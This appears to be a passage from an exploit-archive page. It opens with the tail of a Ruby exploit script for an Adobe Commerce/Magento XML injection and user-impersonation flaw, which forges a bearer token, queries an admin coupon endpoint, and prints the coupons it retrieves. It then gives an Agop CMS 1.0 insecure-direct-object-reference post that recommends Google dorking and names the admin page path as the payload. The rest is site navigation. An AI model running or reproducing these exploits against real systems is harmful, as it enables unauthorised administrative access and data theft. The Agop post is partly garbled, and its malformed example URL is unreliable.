        # Perform authenticated request to a admin endpoint  
        res = http.request(Net::HTTP::Get.new('/rest/default/V1/coupons/search?searchCriteria=', {'Authorization' => "Bearer #{jwt}"}))  
        raise RuntimeError, "Server returned unexpected response" unless res&.code == '200'  
        puts "Available coupons:"  
        puts JSON.pretty_generate(JSON.parse(res.body))  
      else  
        puts "Failed to extract key from file content."  
      end  
    else  
      puts "Failed to read file content or content is empty."  
    end

    puts "Exploit completed"

  rescue RuntimeError => e  
    puts "#{e.class} - #{e.message}"  
  ensure  
    if pid  
      Process.kill("INT", pid)  
      Process.wait(pid)  
    end  
  end  
end

if __FILE__ == $0  
  @target_uri = URI.parse(ARGV[0])  
  @srv_host = URI.parse(ARGV[1])

  exploit()  
end

Adobe Commerce / Magento Open Source XML Injection / User Impersonation

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

**Agop CMS 1.0 Insecure Direct Object Reference**

Posted Jul 22, 2024

Authored by indoushka

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 1ed22de09e417dcaed8d9f03d8d62abd6b70fc4587552e70a4bdbce253d3011b

Download | Favorite | View

**Agop CMS 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Agop CMS v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/managePages.php[+] https://www/127.0.0.1/tiktrades.com/admin/managePages.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,061)
*   Arbitrary (16,823)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,776)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,985)
*   Encryption (2,389)
*   Exploit (53,050)
*   File Inclusion (4,256)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,875)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,161)
*   Local (14,770)
*   Magazine (586)
*   Overflow (13,147)
*   Perl (1,435)
*   PHP (5,219)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,602)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,021)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,584)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,893)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,234)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (376)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,456)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,351)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,673)
*   UNIX (9,429)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Tag

#ruby